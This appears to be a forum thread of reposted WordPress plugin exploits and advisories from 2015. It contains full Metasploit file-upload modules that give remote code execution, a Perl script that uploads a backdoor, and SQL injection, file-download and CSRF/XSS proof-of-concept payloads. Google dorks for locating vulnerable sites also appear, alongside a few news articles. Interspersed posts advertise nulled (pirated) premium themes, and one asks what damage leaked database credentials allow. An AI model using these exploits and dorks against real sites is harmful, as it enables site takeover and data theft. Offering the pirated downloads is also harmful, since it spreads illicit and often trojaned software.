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  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin from version to It allows to upload arbitrary PHP code and get remote code execution. This module has been tested successfully on WordPress WPshop eCommerce with WordPress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'g0blin', # Vulnerability Discovery, initial msf module 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '7830'], ['URL', 'https://research.g0blin.co.uk/g0blin-00036/'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WPshop eCommerce', {}]], 'DisclosureDate' => 'Mar 09 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('wpshop', '', '') end def exploit php_page_name = rand_text_alpha(5 + rand(5)) + '.php' data = Rex::MIME::Message.new data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /#{php_page_name}/ print_good("#{peer} - Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, "#{peer} - Server did not answer") end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress InBoundio Marketing PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version 2.0. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'KedAns-Dz', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '36478'], ['OSVDB', '119890'], ['WPVDB', '7864'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['InBoundio Marketing 2.0', {}]], 'DisclosureDate' => 'Mar 24 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('inboundio-marketing') end def exploit php_page_name = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body.include?(php_page_name) print_good("#{peer} - Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'Server did not answer') end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_inboundio_marketing_file_upload.rb.txt
  3. ======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  4. ###################### # Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Video Gallery - Best YouTube and Vimeo Video Gallery Plugin # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense # Date : 2015-04-04 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from SQL injection Location file: /contus-video-gallery/hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); $vid = $_GET['vid']; is not sanitized ###################### # PoC http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[sqli] ###################### # Vulnerability Disclosure Timeline: 2015-04-04: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (same version number) 2015-04-13: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpvideogallery28-sql.txt
  5. Download fo free Easy Social Share Buttons for WordPress Nulled, solution that allows you share, monitor and increase your social popularity. With Easy Social Share Buttons for WordPress you will take your social sharing and following on a next level. Download
  6. ###################### # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Duplicator - Copy, Move, Clone or Backup your WordPress # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip # Date : 2015-04-08 # Tested on : Linux / Mozilla Firefox ###################### # Description Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability Location file: /view/actions.php This is the bugged ajax functions wp_ajax_duplicator_package_delete: function duplicator_package_delete() { DUP_Util::CheckPermissions('export'); try { global $wpdb; $json = array(); $post = stripslashes_deep($_POST); $tblName = $wpdb->prefix . 'duplicator_packages'; $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; $list = explode(",", $postIDs); $delCount = 0; if ($postIDs != null) { foreach ($list as $id) { $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); if ($getResult) { $row = $getResult[0]; $nameHash = "{$row['name']}_{$row['hash']}"; $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); if ($delResult != 0) { $post['duplicator_delid'] variable is not sanitized A authorized user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF) ###################### # PoC http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) ###################### # Vulnerability Disclosure Timeline: 2015-04-08: Discovered vulnerability 2015-04-08: Vendor Notification 2015-04-09: Vendor Response/Feedback 2015-04-10: Vendor Send Fix/Patch 2015-04-10: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpduplicator-sqlxsrf.txt
  7. Sunt curios ce fel de damage se poate face daca cunosti urmatoarele date de la un mysql la un site de wordpress?. Spre exemplu: /** The name of the database for WordPress */ define('DB_NAME', 'xxxx'); /** MySQL database username */ define('DB_USER', 'xxxx'); /** MySQL database password */ define('DB_PASSWORD', 'xxxxxx'); /** MySQL hostname */ define('DB_HOST', 'xxxxx'); define('AUTH_KEY', define('SECURE_AUTH_KEY', define('LOGGED_IN_KEY', define('NONCE_KEY', define('AUTH_SALT', define('SECURE_AUTH_SALT', define('LOGGED_IN_SALT', define('NONCE_SALT',
  8. Download nulled Xiara WordPress Theme v1.7. Responsive Onepage Parallax Theme is a smooth, simple to use, agreeable and clean. Everything in Xiara WordPress Theme was made to give the best user-experience possible. We carefully focus in the design, colors, layout, usability, and typography. Download
  9. Download Nulled Ultimate Avada 3.7.4 WordPress Theme. It is clean, super flexible, responsive, includes Fusion Page Builder and comes packed with powerful options! This multi-purpose WordPress theme sets the new standard with endless possibilities, top-notch support, and free lifetime updates with newly requested features from our users. And its the most easy-to use theme on the market! Descarcare
  10. Enfold WordPress Theme is a clean, super flexible and fully responsive Theme (try resizing your browser), suited for business websites, shop websites, and users who want to showcase their work on a neat portfolio site. It comes with a plethora of options so you can modify layout, styling, colors and fonts directly from within the backend. Build your own clean skin or use one of 18 predefined skins right out from your WordPress Admin Panel. Download
  11. #Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_users + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Image: http://www.itas.vn/uploads/newsother/disclosure.png + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie s-in-Hakin9-IT-Security-Magazine-78.html?language=en Best regard -------------------------------- ITAS Team (www.itas.vn) Source
  12. Researchers have seen an uptick in Adobe Flash .SWF files being used to trigger malicious iFrames across websites. Several hundred WordPress and Joomla websites have been swept up in the campaign, first observed by researchers at the firm Sucuri last November. “Though it’s uncertain how many iterations existed in the wild when we first reported the issue, this time we’ve found a lot of websites where the infection looks similar,” Peter Gramantik, a senior malware researcher at the firm wrote Thursday. According to Gramantik the infection is clearly marked by a .SWF file with three random characters as a name that’s stored in a site’s images/banners/ folder. As far as the firm has seen, each file has a random hashed ID parameter attached to the end of it. While the malware’s variable names, coding logic, and UserAgent remain the same, one of the main differences from last November’s version of the campaign and this one is that this incarnation has spread to from Joomla sites to WordPress sites. As is to be expected, the website delivering the malicious payload has changed as well. The .SWF files, also known as small web format files, inject an invisible iFrame, which can go on to drop other exploits. Source
  13. ###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif Source
  14. #Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2825 #Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team :: PROOF OF CONCEPT :: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: targer.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026 Content-Length: 683 -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="action" upload_ad_image -----------------------------108989518220095255551617421026- + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 303 to 314 case 'sam_ajax_upload_ad_image': if(isset($_POST['path'])) { $uploadDir = $_POST['path']; $file = $uploadDir . basename($_FILES['uploadfile']['name']); if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) { $out = array('status' => "success"); } else { $out = array('status' => "error"); } } break; + REFERENCE: - ITAS Vietnam | ITAS Corp s-in-Hakin9-IT-Security-Magazine-78.html?language=en - Best regard -------------------- ITAS Team (ITAS Vietnam | ITAS Corp) Source: http://packetstorm.wowhacker.com/1504-exploits/wpsam-upload.txt
  15. Researchers at Malwarebytes have identified an attack campaign believed to be exploiting a vulnerability in a WordPress plugin. During the past few days, Malwarebytes detected multiple WordPress sites injected with a malicious iframe. The iframe redirects victims to a phony version of The Pirate Bay site. Once there, victims are served the Nuclear exploit kit via a drive-by download attack. "This exploit kit targets most browser plugins but it focuses in particular on the Flash Player which was affected by no less than three zero days in the span of a month," said Jerome Segura, senior security researcher at Malwarebytes Labs. According to Segura, Malwarebytes does not have the exact numbers of how many sites are impacted. However, he said the attack appears to be a specific or targeted campaign. As of this afternoon, the phony site is still up. "And I can add something that I didn't mention originally, in that the site does not index real torrent results but rather pushes a program, maybe to collect affiliate kickbacks," he said. "We believe it has to do with a WordPress plugin rather than the CMS itself," Segura noted. "We have seen similar attacks in recent months taking advantage of the RevSlider Plugin and this could be linked to it." "Once the vulnerability has been exploited, the bad guys usually upload backdoors and shells designed to not only maintain control of the compromised website but also alter its core files, such as injecting iframes," he added. WordPress is one of the most popular - and most targeted - content management systems. In the case of the RevSlider attack, more than 100,000 WordPress websites were found to have been compromised. Segura suggested anyone running WordPress make sure their site and plugins are fully patched, and recommended people not log into their site from unsecure access points such as public Wi-Fis. The attack is ongoing, Segura said. Sursa: Cloned Pirate Bay Site Serving Malware | SecurityWeek.Com
  16. Link: Free PHP Web Hosting. No Forced Ads. Unlimited Resources. #1 in USA, UK & Canada -> F?r? reclame... -> Full Wordpress , PHP & MySql Support.
  17. Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/ Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip Date : 28 / 3 / 2015 Tested On : windows 8.1 + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit: | | [+] Vulnerable file : 404 Not Found ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> 404 Not Found[File Address] Examples : 404 Not Found ######################################### ######################################### Discovered by : Rq07 ######################################### Source: http://dl.packetstormsecurity.net/1503-exploits/wpaspose-disclose.txt
  18. =============================================================================== CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/ * Severity: HIGH * Version Affected: Version 3.4 and mostly prior to it * Version Tested : Version 3.4 * version patched: 4.0 * CVE ID : CVE-2015-2755 Description =========== Vulnerable Parameter -------------------- * Latitude: * Longitude: * Map Width: * Map Height: * Map Zoom: * And all Input Boxes About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin After installing the plugin 1. Goto settings -> Google Map Travel 2. Insert this payload ## "> <script>+-+-1-+-+alert(document.cookie)</script> ## Into Any above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Google Map Travel settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST"> <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" /> <input type="hidden" name="long" value="76.26730" /> <input type="hidden" name="lang" value="en" /> <input type="hidden" name="map_width" value="500" /> <input type="hidden" name="map_height" value="300" /> <input type="hidden" name="zoom" value="7" /> <input type="hidden" name="day_less_five_fare" value="llllll" /> <input type="hidden" name="day_more_five_fare" value="1.5" /> <input type="hidden" name="less_five_fare" value="3" /> <input type="hidden" name="more_five_fare" value="2.5" /> <input type="hidden" name="curr_format" value="$" /> <input type="hidden" name="submit" value="Update Settings" /> <input type="submit" value="Submit request" /> </form> </body> </html> . image:: csrf.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Update to version 4.0 Change Log ========== https://wordpress.org/plugins/ab-google-map-travel/changelog/ Disclosure ========== 07-March-2015 Reported to Developer 11-March-2015 Reported to Wordpress 11-March-2015 Acknowledgement from Developer 16-March-2015 Wordpress reviwed and publish the updated plugin. 16-March-2015 Requested for CVE ID 27-March-2015 CVE Assign 28-March-2015 Reposted with CVE ID credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source: http://dl.packetstormsecurity.net/1503-exploits/wpabgmt-xssxsrf.txt
  19. # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Link : Premium plugin # Dork Google: revslider.php "index of" # Date : 2014-07-24 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability ###################### # PoC http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source
  20. Yoast has released a new version of its popular Google Analytics plugin for WordPress to address a persistent cross-site scripting (XSS) vulnerability that could have been exploited to execute arbitrary code. Google Analytics by Yoast has been downloaded nearly 7 million times. The application allows WordPress administrators to monitor website traffic by connecting the plugin to their Google Analytics account. The vulnerability was identified by Jouko Pynnonen, the CEO of Finland-based IT company Klikki Oy. Earlier this month, the expert reported identifying several vulnerabilities in the WPML premium WordPress plugin. According to the researcher, an attacker can leverage a flaw in Google Analytics by Yoast to store arbitrary code in a targeted administrator’s WordPress dashboard. The code is executed as soon as the administrator opens the plugin’s settings panel. The attack involves two security bugs. First, there is an access control flaw that allows an unauthenticated attacker to connect the plugin installed on the targeted website to his own Google Analytics account by overwriting existing OAuth2 credentials. The second stage of the attack relies on the fact that the plugin renders an HTML dropdown menu based on data from Google Analytics. Because this data is not sanitized, an attacker can enter malicious code in the Google Analytics account and it gets executed when the targeted administrator views the plugin’s settings panel. “Under default WordPress configuration, a malicious user can exploit this flaw to execute arbitrary server-side PHP code via the plugin or theme editors,” Pynnonen said in an advisory. “Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target site.” The security issues have been addressed with the release of Google Analytics by Yoast version 5.3.3. The update also fixes a flaw that allowed administrators to launch XSS attacks against other administrators. This vulnerability was publicly disclosed back in February by Kaustubh G. Padwad and Rohit Kumar. This isn’t the first time someone finds a vulnerability in a plugin from Yoast. Last week, UK-based researcher Ryan Dewhurst uncovered a blind SQL injection vulnerability in WordPress SEO by Yoast. Sursa: securityweek.com
  21. OVERVIEW ========== WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version released earlier this week to resolve the issues. DETAILS ======== 1. SQL injection When WPML processed a HTTP POST request containing the parameter ”action=wp-link-ajax”, the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend. The following HTML snippet demonstrates the vulnerability: <script> var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users"; if (document.location.search.length < 2) document.location.search="lang=xx' UNION "+union+" -- -- "; </script> <form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed"> <input type=hidden name=action value="wp-link-ajax"> <input type=submit> </form> The results of the SQL query will be shown in the comments feed XML-formatted. 2. Page/post/menu deletion WPML contains a ”menu sync” function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus. Example: <form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"> <input type=hidden name="action" value="icl_msync_confirm"> <input type=text name="sync" size=50 value="del[x][y][12345]=z"> <input type=submit> </form> Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items be deleted with the same request. 3. Reflected XSS The ”reminder popup” code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like: https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors. CREDITS ======== The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10. Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ An up-to-date version of this document can be found on our website http://klikki.fi . -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi Source
  22. Title: WordPress SEO by Yoast <= - Blind SQL Injection Version/s Tested: Patched Version: 1.7.4 CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 Description: WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used to improve the Search Engine Optimization (SEO) of WordPress sites. The latest version at the time of writing ( has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The plugin has more than one million downloads according to WordPress. Technical Description: The authenticated Blind SQL Injection vulnerability can be found within the 'admin/class-bulk-editor-list-table.php' file. The orderby and order GET parameters are not sufficiently sanitised before being used within a SQL query. Line 529: $orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title'; Line 533: order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) ); If the GET orderby parameter value is not empty it will pass its value through WordPess's own esc_sql() function. According to WordPress this function 'Prepares a string for use as an SQL query. A glorified addslashes() that works with arrays.'. However, this is not sufficient to prevent SQL Injection as can be seen from our Proof of Concept. Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin, editor or author user.*%20from%20(select(sleep(10)))a)&order=asc Using SQLMap: python sqlmap.py -u "*&order=asc" --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; wordpress_logged_in_9dee67...;" Impact: As there is no anti-CSRF protection a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin, editor or author user to click on a specially crafted link or visit a page they control. One possible attack scenario would be an attacker adding their own administrative user to the target WordPress site, allowing them to compromise the entire web site. Timeline: March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst (WPScan Team - Dewhurst Security). March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team). March 10th 2015 - 20:00 GMT: Vendor contacted via email. March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave expected patch timeline. March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches this issue. March 11th 2015 - 12:30 GMT: Advisory released. Source
